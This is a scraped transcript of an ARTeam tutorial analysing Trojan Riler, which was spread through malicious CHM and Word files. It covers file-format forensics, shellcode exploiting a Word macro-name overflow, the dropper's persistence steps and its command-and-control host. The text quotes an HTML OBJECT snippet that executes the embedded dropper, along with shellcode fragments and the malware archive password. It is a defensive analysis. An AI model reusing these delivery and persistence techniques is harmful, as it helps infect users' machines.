introduction to malware techniques and logics part 1 by gunther

38
Author: Gunther Editor: Shub-Nigurrath ARTeam INTRODUCTION TO MALWARE TECHNIQUES AND LOGICS PART 1

Upload: speed22slow

Post on 21-Apr-2015

55 views

Category:

Documents


1 download

TRANSCRIPT

Page 1: Introduction to Malware Techniques and Logics Part 1 by Gunther

Author: Gunther

Editor: Shub-Nigurrath

ARTeam

INTRODUCTION TO MALWARE TECHNIQUES AND LOGICS PART 1

Page 2: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

2

FOREWORDS

Following the great works by EvilCry, I have decided it’s time to release some of my past and present works on Malware Analysis (some of them will be coming soon). This is in the hope of igniting some interests in Malware Analysis via Reverse Engineers’ mindset. This tutorial is written to provide a better understanding of where to find information and what is the aim of most Trojans. Their aim is simply to steal information or to act as a Bot in a Botnet. Please note that this article has been written for learning purposes and not for complex functionality. In the early days, there were many incidents where users received emails with malicious CHM (Microsoft Compiled HTML Help) and DOC (Microsoft Office Word Document) attachments containing Trojan Riler which is also known as BackDoor-BCB. So I have decided to impart some of my knowledge on Forensics in order to complete this tutorial, writing “Introduction to Malware Techniques and Logics part 1”. The tutorial will cover different issues:

• How to decompile .CHM files. How to detect and analyse the shellcode How to dump the backdoor components How to discover the communication protocol

I hope that this could begin a new chapter in the ongoing series of Reverse Engineering and Forensics guides from ARTeam and spark a new interest. Today’s topic will go over “Introduction to Malware Techniques and Logics part 1”.

This paper attempts to document an approach on how the malware developers make use of the Macros and vulnerabilities to install malicious software on the vulnerable machine. We hope this document will help the future Reverse Engineers and Forensics guys / gals to conduct a more viable and comprehensive research. This article does not claim to be complete, exclusivity and is geared towards beginners.

[THIS TUTORIAL COMES WITH AN ARCHIVE

“MALWARE_SAMPLE_BEWARE.ZIP”, WHICH CONTAINS THE MALWARE SAMPLES DISCUSSED HERE.

BEWARE THAT THIS SHOULD BE EXPLORED IN A SAFE ENVIRONMENT ONLY. WE MUST NOT BE CONSIDERED RESPONSIBLE FOR DAMAGES OR DATA LOSS YOU MIGHT HAVE, THE OPERATION IS TOTALLY AT YOUR OWN RISK.

PASSWORD: “INFECTED” AND THEN INTERNAL ZIP HAS PASSWORD “PASSWORD” ALL IN LOWERCASE AND WITHOUT QUOTES.

Page 3: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

3

1 TABLE OF CONTENTS

Forewords ....................................................................................................................................................... 2

Disclaimer/License ........................................................................................................................................... 4

Verification ...................................................................................................................................................... 4

1.1 Initial Analysis ...................................................................................................................................... 5 1.1.1 Focus on Analysis .......................................................................................................................... 5 1.1.2 Verification of CHM file format ...................................................................................................... 6 1.1.3 Interesting Information Extracted from chm File Format ................................................................ 7

1.2 Decompilation Process of .CHM file...................................................................................................... 8 1.2.1 Extraction of Internal files within .CHM file .................................................................................... 8 1.2.2 Analysing the .htm file ................................................................................................................... 9 1.2.3 Analysing the Other Files ............................................................................................................. 10 1.2.4 Converting back to HHP, HHC, HHK format .................................................................................. 10 1.2.5 Dumping of TRojan Dropper ........................................................................................................ 12

1.3 Hiding within .Doc file ........................................................................................................................ 13 1.3.1 Extraction of Streams from .Doc file ............................................................................................. 14 1.3.2 VBA Macros ................................................................................................................................. 14 1.3.3 Finding Shellcode ........................................................................................................................ 14 1.3.4 Let’s do some Shellcode Analysis ................................................................................................. 16 1.3.5 Microsoft Word Macro Name Buffer Overflow Vulnerability ........................................................ 17

1.4 Trojan Dropper Winsrv.exe ................................................................................................................ 18 1.4.1 Dumping of BackDoor Components ............................................................................................. 19 1.4.2 Installation of BackDoor Components. ......................................................................................... 20 1.4.3 BackDoor Component Files .......................................................................................................... 20 1.4.4 Discovery of Communication Protocol ......................................................................................... 21 1.4.5 Deciphering of Communication Protocol ...................................................................................... 22 1.4.6 Handshake .................................................................................................................................. 22 1.4.7 Command Loop ........................................................................................................................... 22 1.4.8 Multiple Sessions Supported........................................................................................................ 23 1.4.9 Information about the Controller ................................................................................................. 23

1.5 Conclusions ........................................................................................................................................ 23

2 INITIAL ANALYSIS 24

2.1 Preliminary Analysis on the malware ................................................................................................. 24

2.2 Live Analysis on the malware ............................................................................................................. 25

2.3 HoneyPot Analysis on the malware .................................................................................................... 26

Page 4: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

4

2.4 Conclusions ........................................................................................................................................ 30

3 APPENDIX A: CONTENT OF THE .HTM FILE 31

4 APPENDIX B: DISASSEMBLY OF SHELLCODE 33

DISCLAIMER/LICENSE

All code included with this tutorial is free to use and modify; we only ask that you mention where you found it. This eZine is also free to distribute in its current unaltered form, with all the included supplements.

We have potentially illegal stuff inside. All the commercial programs used within our tutorials have been used only for the purpose of demonstrating the theories and methods described. These documents are released under the license of not using the information inside them to attack systems of programs for piracy. If you do it will be against our rules. No distribution of patched applications has been done under any media or host. The applications used were most of the times already been patched by other fellows, and cracked versions were available since a lot of time. ARTeam or the authors of the papers shouldn’t be considered responsible for damages to the companies holding rights on those programs. The scope of this document as well as any other ARTeam tutorial is of sharing knowledge and teaching how to patch applications, how to bypass protections and generally speaking how to improve the RCE art. We are not releasing any cracked application. We are not at all encouraging people to release cracked applications; damages if there will be any have to be claimed to persons badly using information, not under our license.

This disclaimer applies to all ARTeam releases and tutorials!

VERIFICATION

ARTeam.esfv can be opened in the ARTeamESFVChecker to verify all files have been released by ARTeam and are unaltered. The ARTeamESFVChecker can be obtained in the release section of the ARTeam site: http://releases.accessroot.com

Page 5: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

5

2 SAMPLE NUMBER ONE

2.1 INITIAL ANALYSIS

I will start off this Malware Analysis on the introduction from how the Trojan is being pushed out to the public and targeted people to the actual dissection of the whole thing. There were incidents that many users received emails with malicious CHM (Microsoft Compiled HTML Help) and DOC (Microsoft Office Word Document) attachments containing Trojan Riler (also known as BackDoor-BCB). Trojan Riler has two distinct groups of components playing different roles:

I. Trojan dropper WINSRV.EXE or WINHEINI.EXE (they are the same) that is dumped from the carrier files (CHM and DOC) when these carrier files are opened. When this dropper is executed, it drops and installs the backdoor components when executed.

II. Backdoor components (WINSSI.EXE, SPORDER.DLL, WINMEDL.DLL and SYNUSB.DLL) that are dumped by the Trojan dropper. These backdoor components provide functionality to connect to a remote host to allow for remote control and remote access to the compromised machines.

During the analysis of the emails, I’ve learnt that the address of the send had been spoofed. This analysis will describe the process on these two malicious attachments to extract information about the attackers and also to reverse-engineer the functionalities of all the Trojan components...

2.1.1 FOCUS ON ANALYSIS I have received 2 samples of this malware in the form of .chm and .doc files and I found out that the Trojan was embedded in (or compiled into) the CHM file in compressed form (LZH). My analysis will focus on the following:

I. Verify that declared file types of the carriers of the Trojan dropper. (This step is important as it will aid us in choosing the correct tools so that we could dissect the files for further analysis.)

II. Clues that can be extracted from the carriers of the Trojan dropper. III. Functions of the Trojan dropper WINSRV.EXE or WINHEINI.EXE. IV. Functions of the backdoor components (WINSSI.EXE, SPORDER.DLL, SYNUSB.DLL and WINMEDL.DLL)

that are dropped by the Trojan dropper, WINSRV.EXE.

Page 6: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

6

2.1.2 VERIFICATION OF CHM FILE FORMAT In order to verify that the .chm file is really just another innocent .chm file, I have decided to use Hex Editor to view the content of for verification purposes. You can more information on Microsoft’s HTML Compiled Help (.CHM) Format published here: http://www.speakeasy.org/~russotto/chm/chmformat.html

http://bonedaddy.net/pabs3/chmspec/0.1.2/Formats.html.

Figure 1 – Hex-Editor View of Sample.chm

Page 7: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

7

2.1.3 INTERESTING INFORMATION EXTRACTED FROM CHM FILE FORMAT There are some interesting information to which we can extract from the sample.chm. So we need to understand the .CHM file headers first.

File Offset: Content at File Offset: 0000: char[4] ‘ITSF’ 0004: DWORD 0x03 (Version number) 0008: DWORD 0x60 or 96 (Total header length)

000C: DWORD 0x01 (Unknown)

0010: DWORD A timestamp. With reference to http://bonedaddy.net/pabs3/chmspec/0.1.2/ITSF.html, this is derived from GetFileTime() function and is the value of the dwLowDateTime member of the last write time parameter.

0014: DWORD 0x0804 = Chinese Simplified1

(Windows Language ID)

With reference to http://bonedaddy.net/pabs3/chmspec/0.1.2/ITSF.html, this ID is the user language ID (from GetUserDefaultLCID) of the Operating System at the time of compilation.

0018: GUID 10 fd 01 7c aa 7b d0 11 9e 0c 00 a0 c9 22 e6 ec GUID = 7C01FD10-7BAA-11D0-9E0C-00A0-C922-E6EC

0018: GUID 11 fd 01 7c aa 7b d0 11 9e 0c 00 a0 c9 22 e6 ec GUID = 7C01FD11-7BAA-11D0-9E0C-00A0-C922-E6EC

Table 1 – Main Header of .chm file format

File Offset: Content at File Offset: 0030: DWORD $0409 = English

(Windows Language ID) With reference to http://bonedaddy.net/pabs3/chmspec/0.1.2/ITSF.html, this came from the program that compiled the ITSF. On Win32, it comes from ITSS.DLL (a Microsoft HMTL Help Author DLL).

Table 2 – Portion of Directory Header of .chm file format

From the above 2 tables, we can deduce that primary language of the Operating System used by the attacker who crafted the CHM probably is using Chinese Simplified according to the language identified in main header of the CHM.

1 Language ID to Language Name translation information obtained from http://windowsitpro.com/article/articleid/15816/where-in-the-registry-is-the-language-setting-for-each-user-stored.html “Where in the registry is the language setting for each user stored?”

Page 8: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

8

2.2 DECOMPILATION PROCESS OF .CHM FILE

Ok, now that we have identified that there is indeed an .exe file within the .chm carrier file. Let’s try to decompile it and extract the .exe file. We are going to use a CHM decompiler, chmdeco, from http://bonedaddy.net/pabs3/hhm/#chmdeco It is a program that converts the internal files of CHM files back into the hhp, hhc, hhk etc. These hhp, hhc and hhk etc files are used to compile the CHM documentation. Before we even begin to convert the .chm file back into the hhp, hhc, hhk etc. The .exe file needs to be extracted.

2.2.1 EXTRACTION OF INTERNAL FILES WITHIN .CHM FILE For the extraction process, I am going to use an utility, istorage.exe, that comes with the chmdeco package for the extraction. It can extract files (streams) from Microsoft compound file objects (also known as Microsoft OLE2 file or Microsoft Structured Storage) and also extract files from CHM files. This is done through OLE StgOpenStorage function, the IStorage interface (for Microsoft compound file objects) and the ITStorage interface (InfoTech Storage, for CHM files). The source code of istorage.exe can be obtained at:

http://bonedaddy.net/pabs3/prog.html#istorage.

Figure 2 – Listing of the files within Sample.chm As expected, we found the Trojan dropper, WINSRV.EXE, in the file listing which we did on the directory which we extracted the files to. The .htm file is the visible content of the CHM file and we will do an analysis on it later.

Page 9: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

9

Detailed format interpretation of various files can be found at:

http://bonedaddy.net/pabs3/chmspec/0.1.2/Formats.html

2.2.2 ANALYSING THE .HTM FILE Basically the .htm file which I had extracted out is the html content of the .chm file. I will show the content of .htm file in the Appendix A. Actually within the .html file, It also contain two sections of exploit code embedded inside whereby it will try to launch the embedded Trojan dropper executable respectively. The following information were found in the MHA.HTM file:

I. The .htm file was generated using Microsoft Word 9 (part of Office 2000). II. The author of .htm file had an initial of “lw”.

III. A directory name was observed in <link rel=File-List href="./Sample.files/filelist.xml">.T IV. he date/time of creation of MHA.HTM was roughly 01 September 2004 07:15 GMT/UTC derived from

“2004-09-01T07:15Z”. V. The date/time of last save of MHA.HTM was roughly 01 September 2004 07:15 GMT/UTC derived

from “2004-09-01T07:15Z”. VI. Registered company for Microsoft Word 9 (part of Microsoft Office 2000) was “software”.

VII. The exploit code to embed Trojan dropper WINSVR.EXE into CHM probably is : <BODY nmouseup=document.selection.empty() oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy=document.selection.empty() onselect=document.selection.empty() background="winsrv.exe">

VIII. The exploit code to execute Trojan dropper WINSVR.EXE probably is : <OBJECT id=RUNIT height=0 width=0 style="display:none;" type="application/x-oleobject" codeBase=winsrv.exe ></OBJECT>

Page 10: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

10

2.2.3 ANALYSING THE OTHER FILES Basically, we should view other files as well in a hex editor but one of the file of interest is the #SYSTEM file. It

showed content with Chinese Simplified characters 木马 meaning Trojan. In addition, the name of the sample.htm was also displayed.

Figure 3 – Hex Editor view of #SYSTEM

Things to take note when analysing the #SYSTEM file is that it also contained a time_t timestamp (DWORD) at file offset 0x08 and the value was 0x41364D19 (1094077721 seconds after 00:00 Jan 1 1970 UTC/GMT). This timestamp was derived from Windows GetLocalTime() function. This value translated to 01 September 2004 22:28:41 GMT/UTC. This could also be the date of CHM compilation. FILETIME structure with dwHighDateTime and dwLowDateTime with values 0x01C48FF5 and 0x4DB7EB78 respectively was found at file offsets 0x42 and 0x3E. This translated to 01 September 2004 7:28:40 GMT/UTC (Windows GetSystemTimeAsFileTime() function is used to generate this timestamp and the format is UTC).

2.2.4 CONVERTING BACK TO HHP, HHC, HHK FORMAT The purposes of the various filetypes could be found here: http://bonedaddy.net/pabs3/chmspec/0.1.2/Authoring.html But for convenience, I will write it here for everyone.

• HHP files are HTML Help Project files and store information on options, window types, merge info, a file list, text popups, information types, contextsensitive help, and subsets and are in INI format. Parts of the HHP format can be excised into text files and included from the HHP. http://bonedaddy.net/pabs3/chmspec/0.1.2/INI.html#HHP

• HHC files are HH Table of Contents files, store the Contents and are in Sitemap format. • HHK files are HH Index files, store the Index and are in Sitemap format. • HHS files are HH Samples files, store the samples information and are in INI format. • STP files are HH Stop-list files, store the words to be ignored when generating search data and are in

text format. • ALI files are HH alias files, store context-sensitivity links and are in text format.

Page 11: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

11

The whole directory of PRESS.CHM.CONTENT was dragged into chmdeco.exe. A new directory “#recreation” was created within it.

Figure 4 – Directory View of Extracted Files

Figure 5 – Directory View of #recreated

Again the Chinese Simplified characters 木马 meaning Trojan was observed. Content of chm 木马.hhp is as follows:

;This HHP file was recreated by chmdeco 0.3 (by Pabs - http://pabs.zip.to) ;It is only an approximation of the original project file. ;Other files that may have been recreated with it are also only approximations. ;See the documentation for parts of the HHP that cannot be recreated. ;Input: C:\chmdeco 0.3\Press.chm.Contents ;Compiled by: HHA Version 4.74.8702 ;Compilation date: 09/01/04 22:28:41 (1094077721 seconds after 0:00 Jan 1 1970) [OPTIONS] Binary Index=No

Compiled file=chm木马.chm Default topic=Sample.htm Language=0x804 Chinese (PRC) [FILES] Sample.htm 14 winsrv.exe

Page 12: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

12

[INFOTYPES]

The following information was gathered from this chm 木马.hhp file: I. The CHM file was compiled by HHA (Microsoft HMTL Help Author, ITSS.DLL) Version 4.74.8702.

II. The CHM file was compiled on 01 September 2004 22:28:41 GMT.

III. The original output filename of the CHM compilation was chm木马.chm

IV. The language option in chm 木马.hhp was 0x804 Chinese (PRC) (also known as Chinese Simplified).

V. Files MHA.HTM and WINSRV.EXE were used to compile chm木马.chm. There was nothing of interest or suspicious in file “Table of Content.hhc”.

2.2.5 DUMPING OF TROJAN DROPPER If you get your VM ready and execute the .chm file within the controlled environment, the embedded Trojan dropper will be dumped into local storage as filename WINSRV.EXE. The location is usually the Temporary Internet Files of the current user. WINSRV.EXE will then be executed in the least restrictive Local Computer Zone via the OBJECT tag and CODEBASE tag. <OBJECT id=RUNIT height=0 width=0 style="display:none;" type="application/x-oleobject" codeBase=winsrv.exe ></OBJECT>

I have also observed that the “exploit code” (more likely could be a feature of HTML and CHM) in Sample.HTM to embed and execute the Trojan dropper. Surprisingly, it worked even on fully patched systems (see the table below). However, explicit double-clicking of the .CHM file is required. The effect is as though as an .EXE attachment was double-clicked.

Operating System CHM able to dump & execute Trojan dropper?

Windows 98 Second Edition (Fully Patched) Yes

Windows 2000 Professional SP4 (Fully Patched) Yes

Windows XP Professional SP3 (Fully Patched) Yes

Table 3 – Operating Systems Tested

Page 13: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

13

2.3 HIDING WITHIN .DOC FILE

I have also received samples of the same Trojan but embedded in a .doc file. Now how do we verify our file which we did the same for the .chm file earlier on? Well, simply if the .doc file is a Microsoft Office Word Document, it should be in Microsoft OLE2 or Microsoft Structured Storage3 file format (a mini-filesystem structure within a file) and can be viewed in DocFile Viewer that comes with Visual Studio or here:

http://support.microsoft.com/kb/139545

Figure 5 – DocFile Viewer displaying streams within DOC file

If you had noticed, “WordDocument” stream is present in the DOC file. It is known that Microsoft Office Word Document has a CLSID (class identifier) of {00020906-0000-0000-C000-000000000046}4 and such CLSID will be present in a Microsoft Office Word Document. CLSID has a type definition of:

typedef struct CLSID{ DWORD Data1; WORD Data2; WORD Data3;

BYTE Data4[8]; } CLSID;

Page 14: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

14

Hence, little-endian representation of DWORD Data1 sequence “0x06, 0x09, 0x02, 0x00” was used to search the DOC file in Hex Editor for the Word Document CLSID.

2.3.1 EXTRACTION OF STREAMS FROM .DOC FILE The istorage.exe utility that comes with the previously mentioned CHM compiler was used to extract the various streams of the DOC file into individual files. The following list of files was obtained from the extraction.

2.3.2 VBA MACROS Now, that we have extracted out the Streams from the .doc file. Next, we can check whether if VBA (Visual Basic for Application) macro was present in the .doc file. If there is, there will be a “\MACROS\VBA” directory structure within the DOC file when viewed in the DOCFILE VIEWER or extraction from istorage.exe. VBA source code extraction program (program source code available at ClamWin project was used to extract the information from the VBA Project and code. VBA_EXTRACT.C was compiled in Linux and all the VBA files in \MACROS\VBA were copied there. “.\VBA_EXTRACT .” was executed and the result obtained. Alternatively, you can download OfficeMalwareScanner by Frank Boldewin. You can use it to extract the VBA too:

http://www.reconstructer.org/code/OfficeMalScanner.zip

2.3.3 FINDING SHELLCODE As I was shit out of luck back then, there was no obvious VBA code that could have dumped and executed the Trojan dropper, I suspected that there could be exploit that tried to use a WORD vulnerability to dump and execute the payload Trojan dropper. I was lucky that searching for string “.EXE” (case-insensitive) in the .doc file yielded a region at file offset 0x1A70 within the DOC file that looked like embedded shellcode.

Page 15: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

15

Figure 5 – Hex View of Suspected Shellcode

After analyzing the file again, I found traces of strings which is Windows API with names such as GetProcAddress, CreateFileA, WriteFile, ReadFile, CreateProcessA etc and filenames such as winheini.exe and MyDoc.doc. If these strings were part of the shellcode, then the shellcode would be in front of these strings. So I did search backwards from the region, immediately what caught my eye a string of NOPs (0x90) at file offset 0x17E0 and I grew suspicious of it. This could be the part of shellcode as a string of NOPs (0x90) is usually used as a “slide” to the shellcode. Thus, I save the region starting from file offset 0x17E0 and ending at file offset 0x1B37 as a binary file. The file size was 856 bytes. The file was passed into IDA Pro for analysis and the result looked pretty promising. Looking at the disassembled code in Appendix B, there were a few indicators that this could be the shellcode. For example, the shellcode tried to find its address within the memory using “call $+5” which meant call the function at address (current EIP + 5).

Page 16: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

16

The next function in the target function shows instruction “pop ebx”. The call action would save the return address which was the address of “pop ebx” onto the stack. “pop ebx” would obtain the return address from the stack and hence register ebx contained the location of shellcode within the memory. The shellcode also tried to make use of Process Environment Block2

(PEB) which was at fixed address 0x7FFDF000. [exa+0Ch] pointed to _PEB_LDR_DATA.

2.3.4 LET’S DO SOME SHELLCODE ANALYSIS The rough idea of finding and doing shellcode analysis is as follows:

1. Find the base address of kernel32.dll that is in fact the handle value of the kernel32.dll. 2. Loop to use function sub_1CE (arbitrarily named by IDA Pro) with handle of kernel32.dll and API name

string to get the function address of the API. Addresses of these APIs are obtained: seg000:00000298 aExitprocess db 'ExitProcess',0 seg000:000002A4 aWinexec db 'WinExec',0 seg000:000002AC aClosehandle db 'CloseHandle',0 seg000:000002B8 aSetfilepointer db 'SetFilePointer',0 seg000:000002C7 aLstrcata db 'lstrcatA',0 seg000:000002D0 aGetsystemdirec db 'GetSystemDirectoryA',0 seg000:000002E4 aGetprocaddress db 'GetProcAddress',0 seg000:000002F3 aCreateprocessa db 'CreateProcessA',0 seg000:00000302 aCreatefilea db 'CreateFileA',0 seg000:0000030E aWritefile db 'WriteFile',0 seg000:00000318 aReadfile db 'ReadFile',0 seg000:00000321 aGetlasterror db 'GetLastError',0 seg000:0000032E aRtlzeromemory db 'RtlZeroMemory',0

3. Get the path of system directory (system32 in Windows NT and above, system in Windows 9x) and

create WINHEINI.EXE. 4. Read from file offset 0x6E00 (hard-coded in shellcode) in DOC file and write the binary content of

Trojan Riler to WINHEINI.EXE. 5. Execute WINHEINI.EXE.

2 Process Environment Block is a high-level user-mode structure that contains some important information about the current process. www.alex-ionescu.com/part1.pdf

seg000:00000007 call $+5 ; Call Procedure

seg000:0000000C pop ebx

Page 17: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

17

2.3.5 MICROSOFT WORD MACRO NAME BUFFER OVERFLOW VULNERABILITY I have looked at the past vulnerabilities of Microsoft Word and found a vulnerability about the Microsoft Word Macro Name Buffer Overflow7. With reference to the “Microsoft Word Macro Name Buffer Overflow Vulnerability” published at http://addict3d.org/index.php?page=viewarticle&type=security&ID=97 dated 17 October 2003, I found out the length of the Unicode macro name declared at file offset 0x135B was 0x500 (1280) Unicode characters. This exceeded the hard-coded limit of 256 Unicode characters in Microsoft Word. If the exploit is successful, around 2560 bytes (1280 x 2) will be copied onto the stack. On a fully patched Windows XP with Office 2003, I used OllyDbg to attached to WINWORD.EXE process prior to opening the .doc file. Exception occurred at instruction at address 0x300057B3. Fortunately, this exception occurred. Otherwise, more tracing effort will be required. At this point of time, the partial content of the stack was: Something must have overwritten a saved return address at 0x12CA6C with value of 0x300057B1 and caused the exception. In addition, the ESP pointed to 0x12CAA4. The Microsoft Word version that the attacker used probably had instruction like “jmp esp” in memory location 0x300057B1 of WINWORD.EXE to jump the shellcode. Searching the DOC file content in Hex Editor for “0xB1, 0x57, 0x00, 0x30” (little-endian representation of 0x300057B1), we found that the address 0x300057B1 was hard-coded.

300057AE 1010 ADC BYTE PTR DS:[EAX],DL 300057B0 0F10FF MOVUPS XMM7,XMM7 300057B3 FFFC ??? ; Unknown command

0012CA6C 300057B1 ±W.0 WINWORD.300057B1 0012CA70 CCCCCCCC ÌÌÌÌ 0012CA74 00CCCCCC ÌÌÌ. 0012CA78 00000000 .... 0012CA7C 00000000 .... 0012CA80 00000000 .... 0012CA84 00000000 .... 0012CA88 00000000 .... 0012CA8C 00000000 .... 0012CA90 00000000 .... 0012CA94 00000000 .... 0012CA98 00000000 .... 0012CA9C 00000000 .... 0012CAA0 90909000 . 0012CAA4 90909090 0012CAA8 000000E8 è... 0012CAAC EB815B00 .[ ë 0012CAB0 00401015 @. 0012CAB4 EC81EC8B ‹ì ì 0012CAB8 00001000 . .. 0012CABC FDF000B8 ¸.ðý 0012CAC0 0C408B7F ‹@. 0012CAC4 AD1C708B ‹p

Page 18: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

18

Later I found out that Microsoft Word in Office 2000 with Service Pack 3 had the same problem with this .doc file. A saved return address was overwritten with value of 0x300057B1 and the esp was pointing to the shellcode. However, the memory location at 0x300057B1 did not contain the required instruction “jmp esp”.

2.4 TROJAN DROPPER WINSRV.EXE

The name of Trojan Riler was WINSRV.EXE in the .CHM file. For simplicity, Trojan dropper WINSRV.EXE shall be used from this point onwards to mean Trojan Riler. Trojan dropper WINSRV.EXE dumped these backdoor component files sporder.dll, winmedl.dll, WinSSi.exe and SynUsb.dll when executed. The target directory was Windows System32 directory on Windows NT and above, and Windows System directory in versions below Windows NT. Then it will add

"PackedCatalogItem" = "%System%\SynUsb.dll"

to the following registry key:

HKLM\SYSTEM\CurrentControlSet\Services\Winsock2\ParametersProtocol_Catalog9\Catalog_Entries\000000[Two random digits]

to add an LSP to the system TCP/IP stack. Once Trojan Riler is being executed, it will open a backdoor on the compromised system by connecting to a specified server. The Trojan then awaits commands from a remote attacker. The Trojan will then attempt to connect to UYGURMAN.VICP.NET on TCP port 53.

Page 19: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

19

2.4.1 DUMPING OF BACKDOOR COMPONENTS The algorithm of dumping and installing the backdoor components is as follows:

I. Determine the Windows system directory (Windows System32 directory or Windows System directory) (via GetSystemDirectory() API).

II. Try to get attributes (via GetFileAttributes() API) of winmedl.dll in the Windows system directory. III. If attribute contains READONLY, remove it (via SetFileAttributes() API). IV. Delete winmedl.dll from Windows system directory. V. Dump winmedl.dll (32 bytes) into Windows system directory.

VI. Use SetFileTime to set LastModified, LastAccessed, CreationTime timestamps of winmedl.dll to 18 March 2002 09:32:46 UTC.

VII. Set attributes of winmedl.dll to READONLY | ARCHIVE (via SetFileAttributes() API). VIII. Copy (via CopyFile() API) WINSRV.EXE into the user’s temp path (obtained via GetTempPath() API) as a

temp file prefixed with “Del”. For example, Del15.tmp. This file will be used for extraction of other executables.

IX. Try to get attributes (via GetFileAttributes() API) of sporder.dll in the Windows system directory. X. If attribute contains READONLY, remove it (via SetFileAttributes() API).

XI. Delete sporder.dll from Windows system directory. XII. Dump sporder.dll (11264 bytes) into Windows system directory.

XIII. Use SetFileTime() api to set LastModified, LastAccessed and CreationTime timestamps of sporder.dll to 16 Apr 2001 09:32:46 UTC.

XIV. Set attributes of sporder.dll to READONLY | ARCHIVE (via SetFileAttributes() API). XV. Try to get attributes (via GetFileAttributes() API) of winssi.exe in the Windows system directory.

XVI. If attribute contains READONLY, remove it (via SetFileAttributes() API). XVII. Delete winssi.exe from Windows system directory.

XVIII. Dump winssi.exe (24576 bytes) into Windows system directory. XIX. Use SetFileTime() api to set LastModified, LastAccessed and CreationTime timestamps of winssi.exe to

14 May 2000 09:32:46 UTC. XX. Set attributes of winssi.exe to READONLY | ARCHIVE (via SetFileAttributes() API).

XXI. Try to get attributes (via GetFileAttributes() API) of synusb.dll in the Windows system directory. XXII. If attribute contains READONLY, remove it (via SetFileAttributes() API).

XXIII. Delete synusb.dll from Windows system directory. XXIV. Dump synusb.dll (69632 bytes) into Windows system directory. XXV. Use SetFileTime() api to set LastModified, LastAccessed and CreationTime timestamps of synusb.dll to

12 June 1999 09:32:46 UTC. XXVI. Set attributes of synusb.dll to READONLY | ARCHIVE (via SetFileAttributes() API).

XXVII. Delete the copied file in user’s temp path.

Page 20: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

20

2.4.2 INSTALLATION OF BACKDOOR COMPONENTS. Depending on the version of victim’s operating systems, WINSRV.EXE does the following to install the backdoor components for autostart:

Operating System Versions

Mechanism for Backdoor Component autostart

Versions below Windows NT 4.0 (such as Windows 95, Windows 98, Windows ME etc)

Register “SynUSB Manager” with value “rundll32.exe SynUSB.dll,RunDll32” In HKEY_LOCAL_MACHINE\Software\ Microsoft\Windows\CurrentVersion\Run. SynUSB.dll exports function RunDll32. rundll32.exe is used to load SynUSB.dll and execute function RunDll32. The code for backdoor mechanism is provided by this function RunDll32. This will take effect when the user logons.

Versions at Windows NT 4.0 and above (such as Windows NT, Windows 2000 and

Windows XP etc)

SynUSB.dll also exports Winsock 2 Service Provider Interface (SPI) function WSPStartup and can function as a Winsock 2 Layered Service Provider (LSP). To register SynUSB.dll as a LSP, WinSSi.exe is executed via WinEXEC API. WinSSi.exe uses sporder.dll which is a DLL provided by Microsoft Platform SDK for the manipulation of installed Winsock 2 Layered Service Provider order in : HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catolog_Entries.

When the LSP is loaded by Winsock 2 service, DllMain of SynUSB.dll creates a thread on function RunDll32. The code for backdoor mechanism is provided by this function RunDll32. When a LSP is installed, a reboot is required for the LSP to be loaded and take effect.

Table 4 – Operating Systems Tested

2.4.3 BACKDOOR COMPONENT FILES SPORDER.DLL - sporder.dll is a DLL provided by Microsoft Platform SDK and hence will not be analyzed. sporder.dll serves no other purpose after installation of the LSP. WINSSI.EXE - WINSSi.exe is used only for the installation of SynUSB.DLL as a Winsock 2 Layered Service Provider (LSP). It requires sporder.dll to work. Within the WINSSi.exe binary, the name of SynUSB.DLL is encoded with XOR 5.

Encoded string: V|kPvg+aii

Decoded string (after XOR 5): SynUsb.dll

WINSSi.exe serves no other purpose after installation of the LSP.

Page 21: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

21

WINMEDL.DLL - The size of WINMEDL.DLL is too small to be a DLL file. WINMEDL.DLL is actually a text file that contains the address (uygurman.vicp.net) and port (53, DNS port) of the controller in the Internet to contact. The string is encoded with XOR 5.

Encoded string: p|bpwhdk+slfu+k`q?06%KPII%KPII%7 Decoded string (after XOR 5): uygurman.vicp.net:53 NULL NULL 2

The connection is observed to be TCP. SYNUSB.DLL - When SYNUSB.DLL is loaded by the autostart mechanism (Registry Run or Winsock 2 LSP mechanisms), a thread is created from function RunDLL32 within the DLL. The thread reads the content of WINMEDL.DLL to determine the address and port of the controller in the Internet to contact. For the rest of this section and subsections, the thread in the victim’s machine is called VICTIM and the Controller in the Internet is called CONTROLLER.

2.4.4 DISCOVERY OF COMMUNICATION PROTOCOL From the decoded string which we gotten earlier on, we now know that the VICTIM would be using uygurman.vicp.net as hostname of the CONTROLLER. Within our test network, we created a hosts file on VICTIM that contained this entry:

uygurman.vicp.net 192.168.1.123

